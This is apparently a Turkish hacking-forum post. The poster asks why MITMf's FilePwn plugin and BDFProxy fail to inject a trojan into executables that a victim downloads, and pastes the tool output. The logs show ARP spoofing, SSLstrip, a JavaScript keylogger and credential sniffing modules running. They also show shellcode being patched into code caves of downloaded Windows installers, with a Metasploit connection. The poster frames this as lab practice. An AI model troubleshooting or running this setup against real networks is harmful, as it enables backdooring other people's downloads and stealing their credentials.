Merhabalar değerli üyeler şuanlık kendi Test labımda bu işi öğrenmek için uğraşıyorum kendimi bu konularda geliştirmek istiyorum şu anlık mantığını çözmek için hazır toolar ile deneme yapıyorum şimdi karşı tarafa indirdiği dosyalara trojan enjekte etmek için kullandığım bu araç neden bu hatayı veriyor ve nasıl çözebilirim
Aynısını BDF Proxy aracı ile yaptığımda onda da benzer hata alıyorumm
Kod:
[*] MITMf v0.9.8 - 'The Dark Side'
|_ FilePwn v0.3
| |_ BDFProxy v0.3.2 online
| |_ Connected to ****sploit v4.16.61-dev
|_ JSKeylogger v0.2
|_ Spoof v0.6
| |_ ARP spoofing enabled
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
* Serving Flask app "core.mitmfapi" (lazy loading)
* Environment: production
WARNING: Do not use the development server in a production environment.
Use a production WSGI server instead.
* Debug mode: off
|_ HTTP server online
* Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ DNSChef v0.4 online
|_ SMB server online
Kod:
2018-06-18 23:34:24 10.0.2.5 [type:Other-Other os:Other] [FilePwn] Patching failed
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Gathering file info
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Adding New Section for updated Import Table
[!] Adding CreateThread Thunk in new IAT
[!] Adding LoadLibraryA Thunk in new IAT
[!] Adding VirtualAlloc Thunk in new IAT
[!] Adding GetProcAddress Thunk in new IAT
[*] Gathering file info
[*] Checking updated IAT for thunks
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 45
[*] All caves lengths: 82, 457, 45
[*] Attempting PE File Automatic Patching
[!] Selected: 219: Section Name: .rdata1; Cave begin: 0xa501db End: 0xa503a8; Cave Size: 461; Payload Size: 457
[!] Selected: 216: Section Name: .rdata1; Cave begin: 0xa4fc68 End: 0xa4fe35; Cave Size: 461; Payload Size: 82
[!] Selected: 188: Section Name: .rdata1; Cave begin: 0xa4ff74 End: 0xa4ffca; Cave Size: 86; Payload Size: 45
[*] Changing flags for section: .rdata1
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
Failed to read certificate file: /usr/share/backdoor-factory/certs/Verisign.cer
140707243787456:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/VerisignPrivateKey.pem','rb')
140707243787456:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182:
140707243787456:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/Verisign.cer','rb')
140707243787456:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182:
Failed
2018-06-18 23:34:33 10.0.2.5 [type:Edge-13 os:Windows] [FilePwn] Patching complete, forwarding to user
2018-06-18 23:34:33 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
a = f(**args)
File "/usr/share/mitmf/plugins/filepwn.py", line 657, in response
with open(bd_file, 'r+b') as file2:
IOError: [Errno 2] No such file or directory: 'backdoored/tmprDZIZz'Aynısını BDF Proxy aracı ile yaptığımda onda da benzer hata alıyorumm
Kod:
[!] Writing resource script.
[!] Resource writen to bdfproxy_msf_resource.rc
[!] Configuring traffic forwarding
[*] Starting BDFProxy
[*] Version: v0.3.9
[*] Author: [USER=151672]midnite[/USER]_runr | the[.]midnite).(runr<at>gmail|.|com
Kod:
[*] HOST: 23.xxx.xxx.12
[*] PATH: /8576cda7b0579adb1a5ef0071050218a2de14006/graphics/iview451_x64_setup.exe
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win64 entry instructions
[*] Gathering file info
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Adding New Section for updated Import Table
[!] Adding CreateThread Thunk in new IAT
[!] Adding LoadLibraryA Thunk in new IAT
[!] Adding VirtualAlloc Thunk in new IAT
[*] Gathering file info
[*] Checking updated IAT for thunks
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Checking execution Level
[*] File already set to highestAvailable execution level
[!] Could not patch higher run level in manifest, requestedExecutionLevel did not exist
[*] Creating win64 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 55
[*] All caves lengths: 167, 501, 55
[*] Attempting PE File Automatic Patching
[!] Selected: 193: Section Name: .rdata1; Cave begin: 0x35d311 End: 0x35d50a; Cave Size: 505; Payload Size: 501
[!] Selected: 188: Section Name: .data; Cave begin: 0x6763e End: 0x67837; Cave Size: 505; Payload Size: 167
[!] Selected: 133: Section Name: .rdata1; Cave begin: 0x35d72c End: 0x35d767; Cave Size: 59; Payload Size: 55
[*] Changing flags for section: .data
[*] Changing flags for section: .rdata1
[*] Patching initial entry instructions
[*] Creating win64 resume execution stub
[*] Looking for and setting selected shellcode
Failed to read certificate file: /usr/share/backdoor-factory/certs/Verisign.cer
139714431345856:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/VerisignPrivateKey.pem','rb')
139714431345856:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182:
139714431345856:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/Verisign.cer','rb')
139714431345856:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182:
Son düzenleme:
